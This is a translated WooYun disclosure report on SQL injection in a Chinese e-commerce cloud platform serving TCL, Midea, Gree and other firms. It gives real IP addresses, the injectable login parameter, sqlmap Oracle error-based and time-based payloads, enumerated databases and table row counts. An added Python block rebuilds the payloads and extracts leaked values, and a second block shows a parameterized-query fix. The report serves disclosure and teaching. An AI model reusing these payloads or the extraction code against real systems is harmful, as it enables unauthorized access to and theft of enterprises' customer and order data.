
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-098403

Title: SQL injection in a Guangzhou Tongwang platform (leads to data leakage from the enterprise platforms of TCL, Midea, Povos, Haier, Macro, Gree and others)

Vendor: 广州同望科技 (Guangzhou Tongwang Technology)

Author: 几何黑店

Submitted: 2015-02-26 14:27

Fixed: 2015-04-13 16:58

Published: 2015-04-13 16:58

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed to a third-party partner organization (Guangdong Information Security Evaluation Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-02-26: Details sent to the vendor, awaiting the vendor's handling
2015-02-27: Vendor confirmed; details visible to the vendor only
2015-03-09: Details opened to core white hats and experts in the relevant field
2015-03-19: Details opened to regular white hats
2015-03-29: Details opened to intern white hats
2015-04-13: Details opened to the public

Summary:

Wishing you prosperity; hand over the red envelope.
广州同望科技发展有限公司 (Guangzhou Tongwang Technology Development Co., Ltd.) is a domestic provider and operator of enterprise information-management platform software and e-commerce platforms. The company offers information products and e-commerce marketing solutions such as "eTW e-commerce management, CRM marketing management, BMS management platform, cloud ERP platform, OA collaborative office, HR management, electronic bidding, SCM management platform", and provides operational services such as B2B supply-chain and distribution-chain optimization, giving core manufacturers and the upstream and downstream industry ecosystem around them deeply integrated supply and distribution chains, and thereby a competitive advantage in both.

Details:

First, I saw the report WooYun: TCL某网络分销平台弱口令致海量订单泄露,包括用户姓名、身份证、电话、家庭住址等敏感信息 (weak password on a TCL online distribution platform leaks a huge volume of orders, including customer names, ID numbers, phone numbers, home addresses and other sensitive data). I had a quick look and thought it looked promising, so...
Start from the IP: 120.132.154.5 / 120.132.154.17. Hm? It turns out to be an e-commerce network-distribution cloud platform; the big enterprises point their subdomains at this IP, and the IP also maps to etwowin.com.
I fired up 猪猪侠's tool and started scanning; a day later the subdomains under etwowin.com came out, all named after enterprises:

tcl.etwowin.com
fsbcss.etwowin.com
dual.etwowin.com
macro.etwowin.com
tclbjd.etwowin.com
povos.etwowin.com
mmg.etwowin.com
kqn.etwowin.com
bdcrm.etwowin.com
gree.etwowin.com
These domains each correspond to a vendor, for example
macro.etwowin.com  Macro (万家乐)
MMG.etwowin.com  Midea (美的)
gree.etwowin.com  Gree (格力)
bdcrm.etwowin.com/  Guangdong Bida (广东必达)
haierhb.etwowin.com  Haier (海尔)


There are too many to list them all.
Next, I found that http://120.132.154.5:8080/web/SubmitLogin.do has a POST injection in the parameter value(userName).
Ran it through sqlmap and the data came out:

Parameter: value(userName) (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: Submit=%e6%8f%90%e4%ba%a4&value(entcode)=&value(entcode)=94102&value(isshop)=1&value(password)=g00dPa$$w0rD&value(userName)=1' AND 7714=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (7714=7714) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'Rxqk'='Rxqk
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: Submit=%e6%8f%90%e4%ba%a4&value(entcode)=&value(entcode)=94102&value(isshop)=1&value(password)=g00dPa$$w0rD&value(userName)=1' AND 2487=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(98)||CHR(65)||CHR(115),5) AND 'mHrF'='mHrF
---
web application technology: Servlet 2.5, JSP 2.1
back-end DBMS: Oracle
available databases [44]:
[*] ACA
[*] AMITIME
[*] BOWEILE
[*] CLZ
[*] DBSNMP
[*] ESOEASY
[*] ETOWAY
[*] ETWBASE
[*] ETWINTF
[*] GJZX
[*] HZJE
[*] ITTAST
[*] JENS
[*] LETESAEL
[*] MACRO
[*] MACROOTO
[*] MACROSHOP
[*] MACROXJD
[*] NCA
[*] OPAY
[*] OUTLN
[*] POVOS
[*] POVOSFX
[*] POVOSPCP
[*] QINYUAN
[*] RSDFX
[*] SUNOJOY
[*] SYS
[*] SYSTEM
[*] TCLBX
[*] TCLBXNEW
[*] TCLKT
[*] TCLKTFX
[*] TCLXJD
[*] TSMSYS
[*] TW
[*] TW519
[*] TWAUTO
[*] TWESHOP
[*] TWFUWU
[*] TWFX
[*] TWMACRO
[*] WMSYS
[*] XXJD


The database names are abbreviations of the enterprise names.
Let's see how many tables there are and how much data they hold.

Database: TCLBX
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| CPCSYSLOG | 1386233 |
| SHOP_TB_WL_KC_DL | 73261 |
| LOGINLOG | 54010 |
| SHOP_ORDER_H_CZGD | 15767 |
| SHOP_ORDER_LINE_H_CZGD | 14855 |
| SMS_BAK | 11322 |
| SHOP_ORDER_LINE | 9286 |
| SHOP_ORDER | 9153 |
| SHOP_PACKAGE_FOLLOW | 8160 |
| TMP_SHOP_ORDER | 7021 |
| SHOP_ORDER_LINE_HISTORY | 4662 |
| SHOP_ORDER_HISTORY | 4594 |
| CPCDOCH | 3989 |
| SHOP_REMIT_MONEY_HISTORY | 3965 |
| CPCDOC | 3906 |
| SHOP_ENTCODE_AREA | 3711 |
| BID_LOGIN_NODE | 3545 |
| SHOP_REMIT_MONEY | 3388 |
| BAK_SHOP_INVENTORY | 3060 |
| GXH_BAK | 2376 |
| CPCORGUSER | 1929 |
| TMP_PHONE | 1713 |
| CPCDICT | 1672 |
| MEMBER_FOLLOW | 1580 |
| SHOP_MEMBER_APPLY | 1080 |
| CPCROLEUSER | 1027 |
| CPCUSERENT | 1001 |
| SHOP_COMPACT | 932 |
| CPCROLEMOD | 883 |
| SHOP_MEMBER | 802 |
| SHOP_INV_BILL_LINE | 657 |
| SHOP_INV_BILL_HEAD | 640 |
| CPCROLEOBJ | 626 |
| SHOP_SPECIALPRICE_LINE | 622 |
| CPCSYSCONF | 584 |
| CPCATTACH | 583 |
| COMPARE_TABLE_ROWS | 577 |
| SHOP_PRODUCT_PRICE_HISTORY | 543 |
| CPCUSERPROFILE | 535 |
| SHOP_TRANSFER | 524 |
| CPCFDRREF | 495 |
| CPCPROCCONDTEMP | 481 |
| CPCROLEMENUACL | 472 |
| SHOP_INVENTORY | 450 |
| CPCSHTCOL | 340 |
| CPCDRAWITEMREL | 312 |
| SHOP_SPECIALPRICE_HEADER | 312 |
| SHOP_MEMBER_HISTORY | 290 |
| CPCIDLIST | 271 |
| SHOP_PRODUCT_HISTORY | 216 |
| PDM_DEFPROPSET | 203 |
| PDM_ITEMEXPPROP | 200 |
| SHOP_OUT_BILL_LINE | 191 |
| SHOP_OUT_BILL_HEAD | 184 |
| PDM_ITEMEXPPROPH | 171 |
| SHOP_PRODUCT_PRICE | 159 |
| TMP_SHOP_MEMBER | 151 |
| SHOP_IN_BILL_LINE_INTF | 147 |
| SHOP_IN_BILL_HEAD_INTF | 144 |
| CPCDOCCROSS | 130 |
| CPCOBJCONF | 129 |
| CPCUSERMOD | 129 |
| CPCWSOBJ | 124 |
| CPCWSREF | 111 |
| CPCUSER_BAK | 96 |
| AREA_WAREHOUSE | 94 |
| SHOP_MEMBER_MESSAGE | 75 |
| CPCMOD | 74 |
| CPCSHTINS | 73 |
| PDM_KEYC | 65 |
| CPCCLASPROP | 61 |
| CPCWORKSPACE | 60 |
| CPC_REPORT | 59 |
| CPCENTEBS | 52 |
| SHOP_WAREHOUSE_HISTORY | 50 |
| CPCSHTTABLE | 49 |
| SHOP_PRODUCT | 45 |
| CPCSHTPAGES | 44 |
| CPCUSERSHT | 44 |
| SHOP_CART | 44 |
| CPCSHORTCUT | 43 |
| SHOP_SPD_WAREHOUSE | 43 |
| CPCOBJWFTEMP | 41 |
| CPCENTSCM | 36 |
| CPCMEMBERLEVELCONF | 36 |
| CPCDOCMODEL | 35 |
| SHOP_AREA_WAREHOUSE_DEFAULT | 35 |
| CPCOBJREFCONF | 30 |
| CPCUSERACL | 29 |
| CPCKEYC | 28 |
| CPCOBJPROPTMP | 28 |
| SHOP_FEE_TYPE | 28 |
| CPCCONTACTGLINE | 27 |
| PDM_ITEMH | 26 |
| CPCROLEENT | 25 |
| CPCROLE | 24 |
| CPCAPP | 23 |
| CPCGROUPHEADER | 22 |
| PDM_ECNBOMHEAD | 21 |
| PDM_ECNBOMLINE | 21 |
| PDM_ITEMPROPCHAGELINE | 21 |
| TEMP_MEMBER_DEVELOP_REPORT_Y_M | 21 |
| CPCCALEND | 20 |
| SHOP_PICKING_ORDERLINE | 20 |
| CPCDOCTRK | 19 |
| CPCUSER_ORG | 19 |
| CPCFDR | 18 |
| CPCPOSITION | 17 |
| CPCPOSITIONWORK | 17 |
| SHOP_WAREHOUSE | 17 |
| CPCORGPOSITION | 16 |
| SHOP_AREA_COURIER | 16 |
| DELIVER_MESSAGE | 15 |
| PDM_ITEMPROPCHAGEHEAD | 15 |
| CPCGROUPLINE | 14 |
| CPCFDRH | 13 |
| SHOP_INFO | 12 |
| PDM_ITEMPROPCONF | 11 |
| PDM_ITEMPROPCONF | 11 |
| SHOP_MEMBER_LEVEL_HISTORY | 11 |
| CPCWFPROCTYPE | 10 |
| CPCCODENODE | 9 |
| SHOP_MAIN_CUSTOMER | 9 |
| SHOP_PRODUCT_TYPE | 9 |
| SHOP_SALESMAN | 9 |
| CPCEMAIL | 8 |
| CPCEMAILTRK | 8 |
| CPCPRODUCT | 8 |
| PDM_DOCCLASTREE | 8 |
| SHOP_MEMBER_LEVEL | 8 |
| SHOP_PARAM | 7 |
| CPCCADWS | 6 |
| CPCORGACL | 6 |
| PDM_BOMD | 6 |
| SHOP_INVENTORY_DESC | 6 |
| CPCCONTACT | 5 |
| CPCORG | 5 |
| RESULT_DATA | 5 |
| CPCCLAS | 4 |
| CPCNODEVALUE | 4 |
| CPCUSERAGENT | 4 |
| PDM_BOMCHANGEREASONTYPELINE | 4 |
| PDM_ITEMRELOBJDEF | 4 |
| SHOP_MEMBER_APPKEY | 4 |
| SHOP_OUT_BILL_CHG_LINE | 4 |
| SYSTEM_NOTICE_ENTCODE_LIST | 4 |
| BILL_NUMBER | 3 |
| COMPANY_INFO | 3 |
| COMPANY_ORG | 3 |
| COMPANY_PARAMETER | 3 |
| COMPANY_RELATION_HEAD | 3 |
| CPCBBS | 3 |
| CPCCODE | 3 |
| CPCCONTACTG | 3 |
| CPCOBJWFRIGHT | 3 |
| CPCPUBGUSER | 3 |
| CPCRESOURCE | 3 |
| INVOICE_INF | 3 |
| SHOP_CUSTOMERSINTERFACE_LINE | 3 |
| SHOP_ENTCODE_PAY_TYPE | 3 |
| SHOP_PICKING_LINE | 3 |
| SYSTEM_NOTICE | 3 |
| TENANT_CUSTOMER | 3 |
| TENANT_CUSTOMER_ROLE | 3 |
| USER_INFO | 3 |
| CPCDSSH | 2 |
| CPCFRMCONF | 2 |
| CPCPROJ | 2 |
| CPCSHTCHECK | 2 |
| CPCSHTWFPROC | 2 |
| TAOBAO_ITEM_RECORD | 2 |
| TAOBAO_ITEM_RECORD_HISTORY | 2 |
| CPCBOMVIEW | 1 |
| CPCCOUNTRY | 1 |
| CPCCUST | 1 |
| CPCDSS | 1 |
| CPCENT | 1 |
| CPCINVORG | 1 |
| CPCLOC | 1 |
| CPCPORTALENTMOD | 1 |
| CPCPUBLISHG | 1 |
| CPCSEAPORT | 1 |
| CPCSYSAUTH | 1 |
| CPCUSERREL | 1 |
| CPCVAULT | 1 |
| RPTDS | 1 |
| SHOP_CUSTOMERSINTERFACE_HEADER | 1 |
| SHOP_ENTCODE_COURIER | 1 |
| SHOP_PARMANT | 1 |
| SHOP_PICKING_HEAD | 1 |
| SHOP_PRODUCT_TYPELINK | 1 |
| SHOP_RETURN_REASON | 1 |
| STAFFINFO | 1 |
| TMPCPCUSERIMPORT | 1 |
+--------------------------------+---------+


More than 800 tables.........
The platform data of every big enterprise is laid bare. And that's not all; we can't stop here, so keep digging.
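The two sqlmap payloads above (Oracle error-based via XMLType, and time-based via DBMS_PIPE.RECEIVE_MESSAGE) are hard to read as raw CHR() chains. The following is an added example, not part of 几何黑店's report and not sqlmap's own code: it rebuilds both payloads from their parts, shows what the CHR() sequences spell out (the sqlmap markers qqzqq / qjzqq and the pipe name vbAs), and parses the leaked value out of the error text. The form field names and marker strings come from the report's payloads; the Oracle error page in SAMPLE_ERROR_PAGE is a constructed sample in the format of Oracle's invalid-QName error, not a capture from the target, and the timing helper is an assumption about how a time-based check is usually decided.

```python
# Added example (not from the original WooYun report): what the two sqlmap
# payloads above actually do, as stand-alone offline Python.
# Assumptions (not from the page): SAMPLE_ERROR_PAGE is a constructed sample in
# the format of Oracle's invalid-QName error; form field names and the marker
# strings are decoded from the report's own payloads.
import re

PREFIX = "qqzqq"   # CHR(113)||CHR(113)||CHR(122)||CHR(113)||CHR(113) in the report
SUFFIX = "qjzqq"   # CHR(113)||CHR(106)||CHR(122)||CHR(113)||CHR(113)


def chr_concat(text: str) -> str:
    """Render text as Oracle CHR(n)||CHR(n)||..., so the payload needs no quotes."""
    return "||".join(f"CHR({ord(c)})" for c in text)


def decode_chr_concat(expr: str) -> str:
    """Inverse of chr_concat: turn CHR(113)||CHR(113)||... back into text."""
    return "".join(chr(int(n)) for n in re.findall(r"CHR\((\d+)\)", expr))


def error_based_payload(inner_select: str) -> str:
    """Oracle error-based (XMLType) payload in the shape sqlmap used here.

    XMLType('<:' || PREFIX || result || SUFFIX || '>') fails to parse, because
    ':qqzqq...' is not a valid QName, and Oracle repeats the offending name in
    the ORA-31011 / LPX-00110 error, so `result` leaks through the error page.
    """
    xml = (f"{chr_concat('<:')}||{chr_concat(PREFIX)}||({inner_select})"
           f"||{chr_concat(SUFFIX)}||{chr_concat('>')}")
    return f"1' AND 7714=(SELECT UPPER(XMLType({xml})) FROM DUAL) AND 'Rxqk'='Rxqk"


def time_based_payload(seconds: int, pipe_name: str = "vbAs") -> str:
    """Oracle time-based blind payload: DBMS_PIPE.RECEIVE_MESSAGE waits `seconds`
    on a pipe nobody writes to, so a true condition shows up as a delay."""
    return (f"1' AND 2487=DBMS_PIPE.RECEIVE_MESSAGE({chr_concat(pipe_name)},{seconds})"
            " AND 'mHrF'='mHrF")


def login_form(username_payload: str, entcode: str = "94102",
               password: str = "g00dPa$$w0rD") -> dict:
    """The SubmitLogin.do form fields from the sqlmap run; value(userName) is injectable."""
    return {
        "Submit": "提交",
        "value(entcode)": entcode,
        "value(isshop)": "1",
        "value(password)": password,
        "value(userName)": username_payload,
    }


def extract_error_result(response_body: str):
    """Pull the leaked value from between the markers in the error text, or None."""
    m = re.search(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX), response_body, re.S)
    return m.group(1) if m else None


def looks_delayed(elapsed: float, baseline: float, seconds: int) -> bool:
    """Time-based oracle (assumed decision rule): true if the response took at least
    the injected delay longer than an uninjected baseline request."""
    return elapsed - baseline >= seconds


# Constructed sample response (not captured from the target): the value between
# the markers is the CASE result, so "1" means the injected condition held.
SAMPLE_ERROR_PAGE = (
    "java.sql.SQLException: ORA-31011: XML parsing failed\n"
    "ORA-19202: Error occurred in XML processing\n"
    'LPX-00110: Warning: invalid QName ":qqzqq1qjzqq" (not a Name)\n'
)

if __name__ == "__main__":
    probe = error_based_payload("SELECT (CASE WHEN (7714=7714) THEN 1 ELSE 0 END) FROM DUAL")
    print(login_form(probe))
    print("leaked:", extract_error_result(SAMPLE_ERROR_PAGE))
    print(time_based_payload(5))
```

Swap the inner SELECT for any scalar query (for example a SUBSTR of a column from one of the listed schemas) and the same error channel returns it one value per request; the time-based variant is the fallback when the application stops echoing database errors.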

Proof of vulnerability:

Since this is a "cloud", the rest of the /24 probably has something too.
I found the same system at http://120.132.154.7:88/, so, same recipe: swapped the IP in the sqlmap command for this one... and the results came out again.

[Screenshot: QQ图片20150226135036.png]


There are a few fewer databases, only 41, and the enterprise names differ somewhat.

Fix recommendation:

Filtering.
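The one-word fix above is the author's. As an added example that is not part of the report or the vendor's response, here is the difference between the string concatenation that makes value(userName) injectable and a query with bound parameters, with a quote-stripping "filter" beside them for comparison. The real application is a Java servlet on Oracle (the equivalent there is java.sql.PreparedStatement with ? placeholders); Python's sqlite3 is used only as a stand-in so the code runs offline, and the table name, column names and sample rows are assumed for illustration.

```python
# Added example (not from the report or the vendor): string concatenation versus
# bound parameters for the login query. Assumptions: sqlite3 stands in for the
# Oracle back end, and the table/column names and rows are made up for illustration.
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the platform's user table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cpcuser (username TEXT, password TEXT, entcode TEXT)")
    conn.executemany("INSERT INTO cpcuser VALUES (?, ?, ?)",
                     [("admin", "s3cret", "94102"), ("tcl_ops", "hunter2", "94102")])
    return conn


def login_vulnerable(conn, entcode: str, username: str, password: str):
    """Same bug class as SubmitLogin.do: user input is pasted into the SQL text, so a
    quote in value(userName) ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT username FROM cpcuser WHERE entcode = '" + entcode + "' "
           "AND username = '" + username + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, entcode: str, username: str, password: str):
    """Bind parameters: the driver sends the values separately from the statement,
    so a quote, a comment marker or an AND clause in the input is just characters
    compared against the column. (Oracle/JDBC equivalent: PreparedStatement with ?.)"""
    row = conn.execute(
        "SELECT username FROM cpcuser WHERE entcode = ? AND username = ? AND password = ?",
        (entcode, username, password)).fetchone()
    return row[0] if row else None


def filter_quotes(value: str) -> str:
    """The kind of "filtering" the fix section suggests. It blocks this particular
    payload, but it is a blacklist that must anticipate every injection form, and it
    mangles legitimate input such as O'Brien. If used at all, use it in addition to
    binding, never instead of it."""
    return value.replace("'", "")


if __name__ == "__main__":
    db = make_db()
    # Comment-terminated payload: closes the literal, then comments out the password check.
    payload = "admin' --"
    print("vulnerable:", login_vulnerable(db, "94102", payload, "wrong"))
    print("fixed:     ", login_fixed(db, "94102", payload, "wrong"))
    print("filtered:  ", login_vulnerable(db, "94102", filter_quotes(payload), "wrong"))
```

The error-based and time-based payloads from the sqlmap run above rely on the same quote-termination as the "admin' --" payload here, so binding the parameter removes all three at once; a filter only removes the ones it happens to match.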

Copyright notice: please credit 几何黑店@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 12

Confirmed: 2015-02-27 16:18

Vendor reply:

Thank you very much for your report.
The issue in the report has been confirmed and reproduced.
Data affected: high
Attack cost: low
Impact: high
Overall rating: high, rank: 12
We are contacting the organization that administers the affected site to handle it.

Latest status:

None yet.